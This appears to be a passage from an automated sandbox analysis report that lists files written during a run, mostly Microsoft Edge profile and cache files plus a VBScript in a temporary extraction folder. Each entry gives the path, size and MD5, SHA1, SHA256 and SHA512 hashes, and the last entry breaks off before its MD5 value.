SHA1
4edd0f1d8259f5c72b9cf38b8f740ce3272e2b6c

SHA256
17e3bc382e0c64ff1b67515d88b832ec9213063dffb17ee33ab1305a9f1d0b4f

SHA512
78b9936137034f4a2b7235e73848ab970614626061b0cb3d3953442637739874ce6839b9f3601d78f3e01f00e944846aa413fcd3b7dc9a9841aba20ad87684f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

Filesize
44KB

MD5
5f025fa8442471bcc10fdbc746443a70

SHA1
b5fdc2ffa5ca0331e08289a17cfd192952e7e6f8

SHA256
8a8999a3d99b01a15fb3a50b61feabdca9f66a5a02c0d1e67a7dacd8e0de4f15

SHA512
ba72fd1455d7063194ddbf9489f136066b8756664c6c0653caca69cd045bf60f8faf3561b201570cb2d2939934a907afc1178e6676fe9dba66dd0054276bc472

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

Filesize
264KB

MD5
fbc2d8989ad82acf55d88d9d19022ca5

SHA1
ee0c11ea330e8653ec2b744d524134d3ca7169f5

SHA256
5e90d0fae7901523c4dd8dd7f2de53a4e13dc98d557544275fbe69054231c201

SHA512
1c6a66df8129fc12b70406bdbff2cf103b65d187224496fcafbc74d9697257f205e6863e2d6d7c5e535da90934796ea4ab1c8c61d88ccee3185697d76370c023

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_2

Filesize
1.0MB

MD5
6df84b0c41d42d665a9b7826f9e6efed

SHA1
a0ff0b9e57cec056ffe51e2c3a88e7151695df08

SHA256
86369b92f86ca178d5ef81be814724b5f10d9e68c51b98137240cafa53e1dbe8

SHA512
381492e2e0e657b4e3f9fbce4a494dca53d0b46e3e3252a9664609b64df0bd42fe4b47851193428ac96eec1adc6a97d692677a4c8ecfde278c6147ef292aa67e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3

Filesize
4.0MB

MD5
922c252ae9cbba1cef749fd464078e9a

SHA1
aed6315a08808d250f451c59a337fe0593940109

SHA256
64716956bb1feacafa94fc40ff9a147bc6ef73039f897d0d0ccb52c474fa8397

SHA512
8c1b351d72b78f070eb3f633b865a31c3fcdb3f7d7ab13d62bc4cffeaf70bf4d9525bdfd68ea07b44221e78fbaa3a0ba19e616b2554ad6eaffa46af2ba750cdb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000014

Filesize
215KB

MD5
d79b35ccf8e6af6714eb612714349097

SHA1
eb3ccc9ed29830df42f3fd129951cb8b791aaf98

SHA256
c8459799169b81fdab64d028a9ebb058ea2d0ad5feb33a11f6a45a54a5ccc365

SHA512
f4be1c1e192a700139d7cff5059af81c0234ed5f032796036a1a4879b032ce4eedd16a121bbf776f17bc84a0012846f467ad48b46db4008841c25b779c7d8f5a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
72B

MD5
2daf081c64b694508f7eb6104da85376

SHA1
ce53c401ae172547a98b9a94749489c9999184be

SHA256
390d1c488f1d4300d5d5fa2409d393fdf7c1533a91c0051b462e932f1b546269

SHA512
de59c172ef3119aa42be005da1bd6972756771c7e5e10cbd999b3ea69464fda716104a16248ef4ed5f3c3fc32f9f9180deb894f6c75b41b83bb3e04701d624ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
576B

MD5
9f0318a98bd11493f4b61c6fdfc0fe09

SHA1
85ba1a2717dec7c65382ea92169a1fdcbdd44735

SHA256
ffa803f2a228ac2e257f8b366037eaebdfdc3b200cb76185efa15b5fc216c69e

SHA512
07ad644c56ad04b8b50b2218e5b41692c8a94e4c915bbf8c093ec95b290a45934445893c470e18ea41aa62541d97c1461e982e89848821644a863f02fa360e57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Filesize
319B

MD5
6d9b261e135b63dfbc91884a10fa86b8

SHA1
d2bccf728b30a863d7d9ba7578ff7a184bdd7cbd

SHA256
b783bb401c68c3aa042395ed8271bf9efca475f08689779119c92a281873789d

SHA512
cd56dc07d8936c94da61aa62dce289cdd1e495ad7060100e500846259adce0277a72d5cf3cd0fd9cd2314b35125e26ae6dd09547990e408b3a00792a05048de6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

Filesize
20KB

MD5
35e07679646927f3ba832eaa68174d42

SHA1
cff4b1e5f526c6ca0d7de18e291bdacbc7a82144

SHA256
90cf8c8506b522e862d70b718c808ac3caa395671e6ce8407b8504d12cc91e02

SHA512
550c5a6d36f1597d1b804f28722444c22b771bbcbbe940a8203b0a48392d185babaf353053b7171f2cbc8468a42fe87451e37d711084f9b594d7939dda1c31fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
c9cdb85b01241c8d8f76ccd199f41332

SHA1
2fed6258396db037b31ae95702175b17d2cd0dbf

SHA256
3c1bcd56d780579404bfb621dbe15ec61c0c29347e764986dcfd9c1083449f44

SHA512
6d3f70ff3a2dea6a5003217e3522a8f9327e2a5c3f4dcd9d627bb04502f5746d6c04c2b19a42bcd39a095e954cb38c4280287b24727e94f3cec7cfd0b77b8637

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
a7ec1ab1d0d782cf2329b7239f1e5a29

SHA1
ffc3c7718291c0300f59ccc1e0fadd6cba53c12d

SHA256
1db04f555c6edec5eec03c38063504cf0f296777e1342a3de5497168df90bc21

SHA512
c22781d3ade820488190f7fc1a92a19cfde1f4affc01b0a4ae9495a02f9573f538b3a5771b00f14da0a0ee9bbe4b29a6cd66a505c0aa77484167f60ea6a99f65

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
116KB

MD5
482d3fcc63db0e75035b13e7a7e753ee

SHA1
4d4d7f4d43e705eab6b32b7b2907701c549f9400

SHA256
2f3151642d89d04ec64a02378a06eecde9339e90b392b7ea3a485260736731d9

SHA512
92433f29642744a05b20111ce48cb03499f6a138e8d44ae3ebcd6635a0998cec2927cf8edc16eaf2b940f9d20d7768618578c371f1ed9f45d2a046d581a88a26

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

Filesize
312B

MD5
e00a95c6032648fad2874a716905c7f5

SHA1
8c3cae573458e4807553c63ef49f6b1c88097d42

SHA256
4b813b14bbb1f5b1b705220d45ffc944498ed9b96f6350b958c96d4518d12621

SHA512
e316c019145209fa472cbd833b09829232621ab35625622847e189c731b4bedeead891972e8ef8f80dcbbb1fc687a7391cc8a5bfb19e6e9c3171b5e69b28717d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Filesize
331B

MD5
f83b883ee1ad9b00fd2a480e1b35572e

SHA1
e830262da03ec419aa33ae920824ebfdb389757f

SHA256
8030b33249502e69b5bb9caa098f13190353d30f7984276e2026d41ff999c27d

SHA512
776a0bcbcecb586789a2b29f9bcebb3a83ab1ba1005f1e9a80c160dc2cc3028d42bf7d68fd0901786ce58c21fabc27d5fb98a16c1ba5c39ca42c2d31f641b4be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
450B

MD5
e2c50360d6ac433075b8c705e2eae613

SHA1
99bb2ad395e6a11c3ba651e618d61416dad5ca39

SHA256
3745c426009344dcd3d5a18f4e3a703b27329f8ffb691d5a965f8473943881fd

SHA512
5c71f0b42f65e58f8b0faafee7b125a3c470e55ea1d0e775b1f2f062a4dfd3dd66194d40419f4a7e9f35adb5bef0612fc9cff75b1be62d2d7b58297126ddfcff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
0a8ffb636f14ecc50dde23938c5b3375

SHA1
493b9caeeff749a5b29a47edf17eb8cba326dd62

SHA256
f37d105f01fc8f911990ea886f1dd74037302487568825ab1986d2a2a8925b2b

SHA512
1e32768427eb3c3467425482eeba6bf04630ddfb64588cea961e3909676ee23d9be2352364bc8a1fe78c1cfc76a9dd277c0dbe387917e2c8c5f544a39e483f08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
2e296677370c69c124812efd0bb3cb81

SHA1
b4b1c138f8877188a2344b83ca48c7e2f04ebc25

SHA256
22e78799d6588d9a896e4c4b93561cba9c0129b69a2d72aa092cab0db25b7e66

SHA512
3341d27bb17b28009da6a718006f4ef4fcce2e1a13b31e69c037d508811cedfd44f1a6f36c3d95a954dc9e94e6289f7e7a5f2951b9eb5f85d0f218392ff01d2a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
70538284729d58f92f6099552fd1f021

SHA1
115b9295e0411666fdf0f2e4deaac2e22ac08ee7

SHA256
4bdb639bb4c2cadd6c80ea8ca2f506b6159a9a700c7a27257e39522f1fe97ee9

SHA512
09b9c367f4d259e05bf216502ed10999e6c8a9e922131e470a5136d0d9ee39255ead7b62614a17142111ad391d3e57fa925860a10145921cfa911277720b7978

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
5f37f0a27ba6c0b94e0c3f13bfe6d614

SHA1
a8fcb07a414297aa8862aa906782b33084c3ae7d

SHA256
5a95901463c44d6f04d82f5ce5e8c299e4b25b8ba23f30c4f0304604e696a00e

SHA512
5a73f59d5bc718123db4c77fc1def9258aa504152b3b897f50dc70cf723d86c409d2eaae7425fabd551968883895ae91d6f73ab7ae518b24ff50c3e6f68ee028

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
36fc27fb545c5d3aba3710e8f95d1516

SHA1
fdd2fbbbdfe7c5ba10d5e89091e3fdd9a8d90051

SHA256
fe7ef7d1fb5dd6b6483fc2976edeb931f91252e9bc12a851d32c85703c216951

SHA512
3c884213e7c3f095247760a767e0903b50b090b7e64823faf77f8be93f363291db7a361f09b824df4616fded2708ab197d879138d4adec0fbae64729391092e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
de7e942a2182b5cfd7e5ad2b9f50f33b

SHA1
31fa636c62fffb11d857575d9c7379efa2357d13

SHA256
f318c01c3a31a993d3d0a6f8b0a1c7e703c9447b9e3b748a3c469ea95b0c61b9

SHA512
8740934b49a05af69546a158e9c018c7371c366beb2a5f7b1baf37a46af648d573d3af948e39b99c97024616230aee6300c20310e690cbc63a0c0732010d4e6d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
fab8927598da371bfe7769f84304ed14

SHA1
96e0c7fe586bb0816070fccfd4bef2bcdf5e6448

SHA256
842caf93ab4a76dddea870108c49ab288950484172c678365c3d32b88d38c7f4

SHA512
51660d719778a3ef19216aacbfeee8b8d71775ed013ff604c54d6343f5cf1c6a11f36d360eaae03676ba7b13b16238a75837d23e80f700474c6e32b9bb52f621

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
a0cca292fbb2a946762b379c1644dbfc

SHA1
08eb04b9ab81c1c625f6233d22e558e6fb9dc403

SHA256
f32f19ef44beaa1cb0fde79fbcfb0bea1e896b2ad85f61e5049ac717a87eccca

SHA512
e495ddf1a1821de9c43344af75228204fffcd6ad705d61c69d9408dd0c88663d470d1417f206878efadc8908ae4151ca287499cae64055174afb62f06f30fb50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
af0e93e973aad7e4679ea04264b44a06

SHA1
d6fdf38f995bf5c20b5e6ef68796c1107551b299

SHA256
b092dd12bcc791c524d2f8dbd86db48529c92735f0baf28dc8e52565ce01155a

SHA512
5db5c9efae76ad34a6b1d9e11d0545cb5f5b93df80feffa97cce22dbcbf3ea349e2037ec8da570b0c552912e93a876a25154bf81665f9b789343b6b0e476d1d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
a8bb97593d55871c2db128928278b852

SHA1
713512a186b087d91299f172bd231526770f6da1

SHA256
1db973499f873a3529ab1a19bfbe479c090292b88c5cb3052d1b0d8d8431d2e0

SHA512
c048fbc788e6d9e453325cc8a64cd1f5520e14259b553ac9c66694fe81d91d98e4e91dc05a0609fd7d5c19ca147178f18aa2f4ba83b8b79551ed4d04810c4861

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Reporting and NEL

Filesize
36KB

MD5
b37fa74f27101e53159261bb40c0c590

SHA1
61ada12a6397e6f17faf5d53bf84b11daeaeac50

SHA256
afa5be2475da78c44d25e4cdf06178d126074bd59f4cb9cce9753438308fb0d4

SHA512
d205d264566d654bda86be7a559a1ae607ef75a7c51ffa62c3f06b4853cf791338c0f989e95c396c68134fbb1648d7e8c43e990ab73c3b7f374ca4c8b2414bb6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
d80f186df150a722839e06672938b93a

SHA1
817edbe4cb83e1d410704a60416a39a7b4c5bf10

SHA256
d6e057235722ebe0d8dbe7a3b53a0b04d178cf577f5f6d1248faf3fec95d1529

SHA512
32bef053022ec128d1a1dfa240cfd535308c3b0318e338cb5c2466fd52ad791b00f6df029a82c0073c4528cffe2cda5cfd58fc6d525e8d696edd8f77094a7833

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5b2547.TMP

Filesize
48B

MD5
a3921862325d6de315aceb72a16e8a1d

SHA1
837d686cc58f9c6a489908c3a7c26e0317e42e16

SHA256
15794d3622b8f812928c973a8be3d8c836c6e48caede91101ee72f93cafc4009

SHA512
65c4ea16b4658e739896b53039afd1701e9c3b22eb9bbbbab228cbd0402e592cb7655c7d979a33546f589aee5298d99de0091cf48b12643dc8eb6bfadaf952da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Filesize
365B

MD5
f021d6b0a40f5d216405116bc2ff75bc

SHA1
2ddb592dd226232fd0c18baf13b57cefbe2f06b1

SHA256
6f667e5932796c35bf7ee54cd1ab9a226a82c7d7b2aceb31f6bd8fab0461fe38

SHA512
252867300aa19a6f201d80b537708805f433b9bab66223473fab044916d884927e684070c60fee89281ac3411b30d4164cff6f3f0fae7d1a96b0c4f6f81240a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Filesize
319B

MD5
b363e487f79cd3e56fae67594bcfe370

SHA1
67368cbcc37e7ffc3517f7899ddde2977a0994a4

SHA256
c084b43aaacc3d35b34f7ebe518fb1ac12886763686bd3beb6135b2084650b66

SHA512
8df171dfed149ec1285ad34c54683924c7ebac146e8510729f8a63e4c85b09e7d8f7c49e5a57eef5e8abdc64f497e87172df6ff3cf6fb5b2f5bbd79ddfaf7186

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13380885529244627

Filesize
1KB

MD5
8b7bf01f3dc09e707573de82fa82ca15

SHA1
82ecc66d75071bc21af3d03ad7adc8b5484967c7

SHA256
c0163ddb740d47da1530c401602cabc9c48710f46a296783526a49237a821fb9

SHA512
eb7726c8101155c206ef18d1607ac97c2de7dabc082e0bbb29ffd5d835c7aed0dfde3950298e05b37fecce8e65fe324f82804aebaf1059f6e9e44b4768d66628

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13380885529472627

Filesize
1KB

MD5
36f1cd2ceb68ffe61a72e59f38380eef

SHA1
430d7f51b81a24ab47b7b3c6ef195cd95028bcbc

SHA256
d01761769434447af9eb65087797cef1d97ec236e7ba2b17d7e202e9dcbb42a9

SHA512
7cda325dca3c54d66e261e09bb9fde024b8aaca6aec2d5b562588cb4f3e93b2b64f54ee26d950f4e84abf50f80303252cfc0435c50fbc6d1495fadb00654f6b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log

Filesize
112B

MD5
9f2c7fbc3761d4a04ced976cac32764b

SHA1
a0b12076941a819799276059f1bb4d19c9c9e48f

SHA256
ecdfb140bf2a269a9df18b52911f1e7c29a2af8ae676bd7bbea578e5c0da6cdd

SHA512
b82467ea867fe8912c43eaac8d351d3de094d12a9b2e991dfc8f18cf0c09532a73d333676597b6a375f453cd4901f62e2c510e5bd6c7163c34c2e3438fb35467

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Filesize
347B

MD5
2e1b0f24767cb743446a58114d1a4c07

SHA1
aee15316183193f9afad5f1e19d2ab6ba97a5720

SHA256
d19ca0b6fbcffacf40448ba95520fbf77aca143089bd6b2bf67943c1cc0a8f56

SHA512
155380abe2a25e38bf86ea37b1ac097d933735749d1d4aaacad8f36b297728a29344a456787edd9048fd4c095c20b9cb22225720e6027724d95be648e0fcbf77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Filesize
323B

MD5
2c3405ccfa3c8d81d59160dadbd354c6

SHA1
08e4899c3b36373290795fab4356bcae42089730

SHA256
470cc6986b315776521e8dc6a3c7f54bdf7fd653fe54b69dc2decd247f3ef72a

SHA512
758626521e2747c14851697c08917cc4a77636b3c9da6a3ec939d603f48ef5cb2a3843dfbc48f8e8230d5b891d4f57ef48a51589ba1132a75cfd28bc0eea8fe4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
873B

MD5
a31b2b4541053edead4abe7a0776928e

SHA1
684b971b84014c652b0b6945d281e9a3221e4f2a

SHA256
7e5143fe38bec5bf8503e2c9e1523672277804d2edc9c939f5a854913161a16c

SHA512
07288201f3e666bb47a3b6ffb00c490915f11ec8f51827e28207902fe0f224e4826f4c42b961b03148ec4eb14f7e0bdc33e2c3926381af6afc25d7dc702e11dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
baefc57ebdde4f76f73c9954567bf6b3

SHA1
53aa266e578823f248d7c164288cad92325b88cc

SHA256
84b6e9041e6624f76def3a5f44ccb505416d5798050dac21f9e1606e54a5e0a3

SHA512
7a9b70d85578e5da32bc7f47082cf039c9ef96feec432f6a6d1d7ee2fae965971863e29d395214ab6bc6973f36388311b83c21f6a468d843e929a86b58a4d4d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

Filesize
128KB

MD5
a89e7429407621998804bb3a4f0f1a21

SHA1
5880787c98136d70f372b8a05b2537e5714fe066

SHA256
f381bd06233864636b4de18b5f526eb1759fb9d82350f5513b5d9f6795a1b00d

SHA512
fc8d39449ae25ef632cfa1143352093b1271886f8a2df9351fc0390f60574cbba3d2cf2798d6462517a02beb3dcb7a23ec37365de7cb58df171f39222b35fc16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
aefd77f47fb84fae5ea194496b44c67a

SHA1
dcfbb6a5b8d05662c4858664f81693bb7f803b82

SHA256
4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

SHA512
b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\LOG

Filesize
136B

MD5
3f1e08038b92b2b9f403b9c604645370

SHA1
d95f627e3f33196185906ec1752b4c4ffd429733

SHA256
32ffffbea6742b06d0f8b8e6dd593a1b242185860b6ec247abd15d563fc81db7

SHA512
ae0f2a55a357bf93fb2861c2769b774dab9c812f9a1fc6138e56448ea9cf52d241dbb630397a3ebcf2cd4e1a96022b3c4fc13fa3a23da6c89907d1108ee6f4e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000004

Filesize
50B

MD5
031d6d1e28fe41a9bdcbd8a21da92df1

SHA1
38cee81cb035a60a23d6e045e5d72116f2a58683

SHA256
b51bc53f3c43a5b800a723623c4e56a836367d6e2787c57d71184df5d24151da

SHA512
e994cd3a8ee3e3cf6304c33df5b7d6cc8207e0c08d568925afa9d46d42f6f1a5bdd7261f0fd1fcdf4df1a173ef4e159ee1de8125e54efee488a1220ce85af904

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

Filesize
44KB

MD5
283f93018c6c17671da9e6933ea7f7d4

SHA1
8aeae2f480d7628884a9ec71639762cec549ec27

SHA256
8523810495275b5a2b4214f13bda9e62dd114fcf68101dd1203eff1438b10dac

SHA512
7647738718c8a4942cc97d3c5c309813310eaa9c9308566d6f92f6a0a9a8190b62f1e46d5671af8e01191b25a953fb5a584f532e80f6337666c4b587f4352cc5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Filesize
2KB

MD5
0f1ea0d0342e69e6ff000739547ea745

SHA1
3cc3381f0001ae2d69d566ba759585b39a0816c1

SHA256
e8e281a51fb501e226510b7e2a49346c6bbb77372cdae8ff17a88870414bd992

SHA512
4db2202ff485eaff30cb843ce422f291acebe59659279bc3e4ed2bd41b0895989bb2e4fdb73cb7b853888b263d73117b51ecc43cc72c511ed674cfae12f7a42e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Filesize
319B

MD5
c7e9d94438409cb779772e3970744f6b

SHA1
6f65fcaf9d622b0621019d4950dd140e7dccbd6b

SHA256
ab7e5ba5c762343d86b42be5c8d50704873cc95388d3a9888a9feb91791bc4db

SHA512
a20cbeed705bb637f8fe54396dde34bc2c024a556b4dd847773638231524c844c547207956b84753e96242790bd57f482dc90b2a6e5790749f42d28a1f70d56d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Filesize
337B

MD5
30eec26ba61334962c4d36735573dede

SHA1
259976d5aee4459717a023a88fa3ef5ca50f84be

SHA256
0900dead3333d46db84fe3e92e7be3f7c4b6d39b27edaba2442228ee8018680f

SHA512
69c7837ea56b36fb24a82255b8d3349dc5e230caecacd525ef43620ac89a8470be4efbe16bac2d32e832113f2c6b60a1551b154a246732c48f74a637d7d95507

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

Filesize
44KB

MD5
153fd62b179fcec499365d8dc77382a9

SHA1
89266d77eb1272d5eb0f6a344fa2cf164be3e6f8

SHA256
75c02d4c67569e82931022cd9b263bd1396da95c3afc04ba6dcb99b0a67e38a7

SHA512
1e68372b38e406440910838aa45d835d50ef66edd1a660fa68dfec36055328f288bdba13ebe8fd97b5543930a1d4bbadcf4f72b6541f19fd64f86cf2dbaf1bec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

Filesize
264KB

MD5
a4460aaa5551d7c90cdb4ced2a90fba3

SHA1
1c3f5b10ad11de4d277c34563c354d78cea5fc96

SHA256
e59e14dd22ab4e320c3f2f94bb599594bc7671701f9a05a79262e31561b309d8

SHA512
af6d6d7488d0c46dd1d7d6f3e9ce9f6f34803a83294c1491d064c60a2cc84bfadf91c5de9c93e98a53ea61afe352079ddd89a1bc59c0793b34c5f0fab2df6108

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3

Filesize
4.0MB

MD5
b5da0d40d6700f2012ba69e1e62ab042

SHA1
2906989f419f142a982596301d807093bebcfcf7

SHA256
3f8ae2064faece0cdf093a86c07c915e7e5fe9b4b5aa258261a5adf3947c22ec

SHA512
ba662bdddc3d3578a1233964e536544631c21c00b6636412f669231d3bf53fc95d54b0c7ee41360bd56f262abedd9bde4d901672007a010e03ba9d6f4e3ebc4f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000001

Filesize
20KB

MD5
7e86d5c1bf2ff36b15bfbd8fcf748b16

SHA1
59a1515ddff8caec85c4f27ffb17b69a42ec6226

SHA256
82f03e141e82546b261c1a24cd9ae3cfd4b19a7b4f343a296428deeda88cf856

SHA512
943fdf966d2ca4bfb35e01431e7bae1611e86d4bbf9c27524ba4502a9a93b8c0bb39e7760a8ee76993c4099da1ff49febe0b48468f134d4121f22a0ffb41bf2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000002

Filesize
20KB

MD5
2a029687e73114ebcb4fad10c0114e8a

SHA1
f09cbbed46b9f8c731568bdcee13024e89bda397

SHA256
fe6e92a5b020858bbdd8089533c6f22703bc5927e22f689c384164096705b11b

SHA512
211dc45e2bb5739bcf863c44ca8132f92e895b3c95d074929aa4338698d53c6ccb3a8e2f23180260d9226073f4f5cd21a200010a7a224de7c8ac2e1cc853730d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

Filesize
11B

MD5
b29bcf9cd0e55f93000b4bb265a9810b

SHA1
e662b8c98bd5eced29495dbe2a8f1930e3f714b8

SHA256
f53ab2877a33ef4dbde62f23f0cbfb572924a80a3921f47fc080d680107064b4

SHA512
e15f515e4177d38d6bb83a939a0a8f901ce64dffe45e635063161497d527fbddaf2b1261195fde90b72b4c3e64ac0a0500003faceffcc749471733c9e83eb011

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
11304b64e26fed57af95c55e5d4d17b7

SHA1
83528ba225f95f6046605118327855881af67843

SHA256
6b4ab2a3ed25337a9d553dc3bf2f4523c806054a946442e80b158d5460074bbe

SHA512
ff22d04706a9688b7507774b050210f6b4c2a30e26c5d634ec31712ee1d7c9d58281ff7e7445bf2a726995077de1cfa924fd626afa198cf70393660d097c88f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
60944fe7d98dc7510efa786c0978a95d

SHA1
d21fc8d912d1b76ccd12473e8cd587ba3893f163

SHA256
d49ae2271586ad960f33a8b93476100d64a4fb44e45e8b46586220888e49a9a7

SHA512
be0cd15a560fedc830961cee5aefec6ef21f6f7024f2a77c96a407365dca79ba626aadabdd33dc0f3e600f2545f0b286f8525062e666152aa23817d755c48b4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
92ca1c90efa9fe9a70890bc70f64edbb

SHA1
6760ce73e43e9cb71c3cba722f7602ddf06298e5

SHA256
86ab14d57b665fa763b6d161fdbc3b0624420dbd9748ca1fd82bcddcad597cf4

SHA512
20da3b9d53b1698782b6ea454c643a5964bbec95522db63a58c4431304d470954edab161cc7d42ac0df9a39d8a9561d40815310939d53a7c5e93086d901b095e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
652fcef1891f53bd194062e62c09f164

SHA1
8f22da2511e18cc0e40e6dae9d992b83ee746114

SHA256
39ea36857bed21087065d04398584a98c400cf7264032339a969c5d8d620f5f3

SHA512
3f8aac64d9371d84fdc6217176b00881b0b04f47255572b5a4d7cc6d4e9b9e331bd88ebe70be34d28e08ae8a700a63050c93d93515fa533d57d07f3c6be5369d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
e02a60af98f5560f5895248cfdf16add

SHA1
071ba3828070cdaed73b643ea9ce4770c6176ef2

SHA256
1ab23e6cd569685daefd813d6cfb7e94377ce5eb08dc48845eab20bfbb9e9ac1

SHA512
a3b86bca2b2ee017a58a5bac79a94f50fcd5ad33aa341225e38440fcfb559b1d7f45d07e87cc23d622950a927484f5cd78f12391abfe771499ed15a903124399

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt

Filesize
4B

MD5
90ad056a5be0c6ddf986931d45a8b34c

SHA1
b4c469c2bb833e4aef40737017d32a5cbe1a924e

SHA256
8e8d6b0952ce8a70fb08245162990376d29e0cbf0fc67e5ea37f00c858f9fccc

SHA512
b70f138554cf2d534fff48a12aee01d0b6d0b1328d206c283b61b3cfa260a8bc16d97f4dd92beaa9c27b9774283934e5855fba62c12b7cba01fb2a4ec9767610

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\677ebc888e619.vbs

Filesize
14KB

MD5
